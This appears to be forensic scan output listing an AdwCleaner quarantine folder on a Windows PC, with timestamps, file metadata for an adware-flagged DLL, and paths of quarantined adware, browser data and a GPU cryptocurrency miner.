          4.4s C:\AdwCleaner\quarantine\registry\reg_mcoutunprxdphivyuvmoatwdyuxhyzwb.reg
          4.5s C:\AdwCleaner\quarantine\registry\reg_tgfeavmdtxngkczofnkyzphiqdfwhsfl.reg
          4.5s C:\AdwCleaner\quarantine\registry\reg_mhdzapqmugdydwjjqicquolddejvwqup.reg
          4.6s C:\AdwCleaner\quarantine\registry\reg_gzmkcboyfqzjhwapfhvqeofjaefhcttm.reg
          4.6s C:\AdwCleaner\quarantine\registry\reg_vazsqhuudufaewoypbfbikwgzqcgqfkc.reg
          4.6s C:\AdwCleaner\quarantine\registry\reg_lwugahqruqrqqjgikiohovxoculwwysx.reg
          4.7s C:\AdwCleaner\quarantine\registry\reg_xeczysjuynsfncsdctquwwgkbnofarzi.reg
          5.3s C:\AdwCleaner\quarantine\registry\reg_iioxwxczjbugugmwqmnueuszmpfqonbi.reg
          5.3s C:\AdwCleaner\quarantine\registry\reg_vrtdutftxfxohlxvramxkkrsqrnaioij.reg
          5.3s C:\AdwCleaner\quarantine\registry\reg_yvmqqvbcuamwvndvtdhefjuqlupmqiha.reg
          5.3s C:\AdwCleaner\quarantine\registry\reg_lwsnkfiuxbhfwjtitvqqzgtpowncmeix.reg
          5.4s C:\AdwCleaner\quarantine\registry\reg_fqcstvuljsuvdliaqoxcapwdameertol.reg
          5.4s C:\AdwCleaner\quarantine\registry\reg_ejsdpauzkeqyotivjhaivmsazspfnnay.reg
          5.4s C:\AdwCleaner\quarantine\registry\reg_yrdzjxchjfseqziayavxdwxeptdtlkom.reg
          5.5s C:\AdwCleaner\quarantine\registry\reg_peqwhjahmytfugksxniwczmpsseymesr.reg
          5.5s C:\AdwCleaner\quarantine\registry\reg_kiusmmvbvgzfcybhqmdrtdwqslscapcd.reg
          5.6s C:\AdwCleaner\quarantine\registry\reg_dtrxafqawoycuacbklvwcnjucjtvfqrq.reg
          5.7s C:\AdwCleaner\quarantine\registry\reg_mpldfxlkqddfqxemmzqxdxycwdwdxush.reg
          5.7s C:\AdwCleaner\quarantine\registry\reg_fiqaqrowoznmrtaduhmmjmdxvzunfivg.reg
          5.8s C:\AdwCleaner\quarantine\registry\reg_mmnettjvbtwenjqfrqilocfnkutzspil.reg
          5.9s C:\AdwCleaner\quarantine\registry\reg_diurulmulfktzboavnxvdildottqhhjx.reg
          5.9s C:\AdwCleaner\quarantine\registry\reg_xrqifbvohcnregydcpounrtfyrmjgmni.reg
          6.0s C:\AdwCleaner\quarantine\registry\reg_sjcuxpukaattukjmzpshxzvediwsgupz.reg
          6.7s C:\Windows\Prefetch\WUDFHOST.EXE-AFFEF87C.pf
          7.1s C:\Windows\System32\winevt\Logs\Microsoft-Windows-Winsock-WS2HELP%4Operational.evtx
          7.6s C:\Windows\Prefetch\NVDISPLAY.CONTAINER.EXE-98FFF787.pf
          7.8s C:\Windows\Prefetch\NVTELEMETRYCONTAINER.EXE-80BD8541.pf
         11.7s C:\Windows\Prefetch\SPOOLSV.EXE-D1F6B8B6.pf

   C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\isxdl.dll
      Size . . . . . . . : 157.632 bytes
      Age  . . . . . . . : 0.1 days (2017-02-13 20:38:14)
      Entropy  . . . . . : 6.3
      SHA-256  . . . . . : 159D00F0D8C7A16736C608DE22E83364A9B15B197874116829293F4D67934890
      Product  . . . . . : ISX Download DLL
      Publisher  . . . . : Bjørnar Henden
      Description  . . . : Download DLL
      Version  . . . . . : 5.1.5.0
      RSA Key Size . . . : 2048
      LanguageID . . . . : 0
      Authenticode . . . : Valid
    > Bitdefender  . . . : Adware.GenericKD.4255115
      Fuzzy  . . . . . . : 98.0
      Forensic Cluster
         -1.4s C:\ProgramData\NVIDIA\MessageBus_4656_0x24D19933300.log
         -1.3s C:\ProgramData\NVIDIA\MessageBus_4656_0x24D18F34700.log
         -1.0s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\
         -1.0s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\LICENSE.txt
         -1.0s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\openweb.bat
         -1.0s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\SnareWindowsInstallSupport.dll
         -1.0s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\stopweb.bat
         -1.0s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\s_32.ico
         -1.0s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\WinSnare.dll
         -0.9s C:\AdwCleaner\quarantine\files\mvmfgnrbrmdbsjisivmhfrvdpvtlbouw\
         -0.8s C:\AdwCleaner\quarantine\files\fpfqjlppnsdxcoxxfuaeemqptrzrgvpn\
         -0.8s C:\AdwCleaner\quarantine\files\fpfqjlppnsdxcoxxfuaeemqptrzrgvpn\BITB16.tmp
         -0.8s C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Micros_2d44ca29ef1bb45be9e81bd7c7de23bb1bff79c7_e127e73b_1c458c2c\
         -0.8s C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Micros_2d44ca29ef1bb45be9e81bd7c7de23bb1bff79c7_e127e73b_1c458c2c\Report.wer
         -0.8s C:\AdwCleaner\quarantine\files\wlhkcwthzxcfadlnsnitwidocovyfcvy\
         -0.8s C:\AdwCleaner\quarantine\files\wlhkcwthzxcfadlnsnitwidocovyfcvy\BITB27.tmp
         -0.7s C:\AdwCleaner\quarantine\files\lvghxrkdvjdmjauuvlqiouualgvwchnk\
         -0.7s C:\AdwCleaner\quarantine\files\atsifbjehqqalokjotexydyeaawktlln\
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\cookies
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\cookies-journal
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Web Data
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Web Data-journal
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\001180cbc33c583f_0
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\02cdb733b079655d_0
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\08bc571418449ead_0
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\092f95ee9c1fc61c_0
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ad89b7fc5facf78_0
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0e02ff08b4002e57_0
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ed73590870cfbd2_0
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ed7399215f555d7_0
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ef5b10d79d9f0cb_0
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0fc3db66b9cbe75d_0
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1b72c2d37a2af109_0
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1dff67c9badf383d_0
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1e20774a42d716f3_0
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1f2ec90a78c46fdf_0
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2009bcf78a35d470_0
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\20ba89671f087fc1_0
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\234986793e71f265_0
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\26968e7a0c71776d_0
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2819c5233c1f77b4_0
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2ac381ccd53e2ce0_0
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2b11e2e523e5d524_0
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\3082972055161e5d_0
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\3a977894dc0fcd39_0
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\442182c02ee0a243_0
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\5125b9f58b582f46_0
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\593d0e1547012291_0
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\5ede7465ad814101_0
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\66928cc3398bdbc9_0
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\66e510668b4796e9_0
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\6e2284174f43f7b0_0
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\711f9f610e35a8b6_0
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7150bac3e922a373_0
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7589f80f2ddeab29_0
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\775e37b82f99c13c_0
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7acdc9382bf6b139_0
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7d8cebaadfd53fbf_0
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7ecc93dfade6cf4e_0
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\8326a92c0f293bc4_0
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\83a226c1379f7a18_0
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\86850034110cf1c4_0
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\8d9b27c428a8f6a3_0
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\8f60e69a4afd6f60_0
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\95ff98c7e9c1b8a3_0
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\a1f309cd5a3eb6fa_0
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\a2719229322771c8_0
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\a2e6c4ddc62e67a7_0
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b07d05bc07d9c08b_0
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b3986aa6d1a5b1ca_0
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b3edef432256edd5_0
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b48454e7eeb33014_0
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\ba7c73f14dafe451_0
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\bd48447363dfb226_0
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\be189d201694bf89_0
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\bfbe9938bbb38577_0
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c0676a458818319d_0
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c3329b5e71fb9773_0
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c487316b1c7eb401_0
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c8bff37e9d993e8c_0
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c94b3024dfacfceb_0
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c9efb04ec241100a_0
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cd31a5585d55d245_0
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cd87b6402756547b_0
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cda276472aafd1d9_0
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cdd7d0e76bb75c18_0
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\ce8699f098de9a28_0
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\d19a15ac54bfa3ba_0
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\d652598e0bff0a74_0
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\d85bf4971be98d9f_0
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\dc7c883ebdb4ce43_0
         -0.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\dd1fa8967c9eedf1_0
         -0.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\e1548e7879784820_0
         -0.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\f4beaede20fc0699_0
         -0.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\f552ab47376f113e_0
         -0.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\f74a8c1655500d73_0
         -0.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\fbef9ceaf336383d_0
         -0.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\fddd11ea475c5135_0
         -0.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\index
         -0.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\index-dir\
         -0.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\index-dir\the-real-index
         -0.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\
         -0.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\file__0.localstorage
         -0.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\file__0.localstorage-journal
         -0.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\http_www.imdb.com_0.localstorage
         -0.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\http_www.imdb.com_0.localstorage-journal
         -0.2s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\
         -0.1s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\backup6.bin
         -0.1s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\German_pcp.dat
         -0.1s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\log_02-12-2017.log
         -0.1s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\log_02-13-2017.log
         -0.1s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\voice\
         -0.1s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\voice\de\
         -0.1s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\voice\de\voice.wav
         -0.1s C:\ProgramData\NVIDIA\MessageBus_5528_0x667E90.log
         -0.0s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\
         -0.0s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\em.exe
         -0.0s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\eng_em.ini
         -0.0s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\French_em.ini
         -0.0s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\German_em.ini
         -0.0s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\ininotfound0.ini
         -0.0s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\ininotfound2.ini
          0.0s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\isxdl.dll
          0.0s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\japan_em.ini
          0.0s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\log_02-12-2017.log
          0.0s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\log_02-13-2017.log
          0.2s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\
          0.2s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra-uninst.exe
          0.2s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\
          0.2s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\decredGeForce GTX 750 Tigw256l4tc4032.bin
          0.2s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\gplyra.conf
          0.2s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\gplyra.exe
          0.2s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\msvcr120.dll
          0.2s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\start.cmd
          0.2s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\
          0.2s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\aes_helper.cl
          0.2s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\blake.cl
          0.2s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\blake256.cl
          0.2s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\bmw.cl
          0.2s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\bmw256.cl
          0.2s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\cubehash.cl
          0.2s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\darkcoin-mod.cl
          0.2s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\decred.cl
          0.2s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\echo.cl
          0.2s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\fugue.cl
          0.2s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\groestl.cl
          0.2s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\groestl256.cl
          0.2s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\jh.cl
          0.2s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\keccak.cl
          0.2s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\keccak1600.cl
          0.2s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\luffa.cl
          0.2s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2.cl
          0.2s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2re.cl
          0.2s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2rev2.cl
          0.2s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2v2.cl
          0.2s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\neoscrypt.cl
          0.2s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\shabal.cl
          0.2s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\shavite.cl
          0.2s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\simd.cl
          0.2s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\skein.cl
          0.2s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\skein256.cl
          0.2s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\vanilla.cl
          0.3s C:\AdwCleaner\quarantine\files\ooayadcdwhbjxeftcugzavjygjooooyj\
          0.3s C:\AdwCleaner\quarantine\files\ooayadcdwhbjxeftcugzavjygjooooyj\WinSAP.dll
          0.4s C:\AdwCleaner\quarantine\files\qshahttdnawtfesajygismqkeplwuzov\
          0.4s C:\AdwCleaner\quarantine\files\qshahttdnawtfesajygismqkeplwuzov\WinSnare.dll
          0.5s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\
          0.5s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\
          0.5s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\sma.exe
          0.5s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smci32.dll
          0.5s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smci64.dll
          0.5s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smi32.exe
          0.5s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smi64.exe
          0.5s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smu.exe
          0.5s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\SMUninstall.exe
          0.5s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smw.sys
          0.6s C:\AdwCleaner\quarantine\files\dnvamrbyynolbnrjffyndvafsiefsaxe\
          0.6s C:\AdwCleaner\quarantine\files\dnvamrbyynolbnrjffyndvafsiefsaxe\smhe.js
          0.6s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\
          0.6s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\Config.json
          0.6s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\set.exe
          0.6s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\set.exe.config
          0.7s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\System.Data.SQLite.dll
          0.7s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\System.Data.SQLite.Linq.dll
          0.7s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\System.Data.SQLite.xml
          0.7s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X64\
          0.7s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X64\SQLite.Interop.dll
          0.7s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X86\
          0.7s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X86\SQLite.Interop.dll
          0.7s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\
          0.7s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\ff.HP
          0.7s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\ff.NT
          0.7s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\snp.sc
          0.8s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\
          0.8s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\Config.xml
          0.8s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\Nettrans.exe
          0.8s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\Nettrans.exe.config
          0.9s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\
          0.9s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Cofstock.exe
          0.9s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Cofstock.exe.config
          0.9s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\conf.config
          0.9s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Config.xml
          0.9s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\DanDubdom.bin
          0.9s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Dong-Home.dll
          0.9s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Fincore.exe
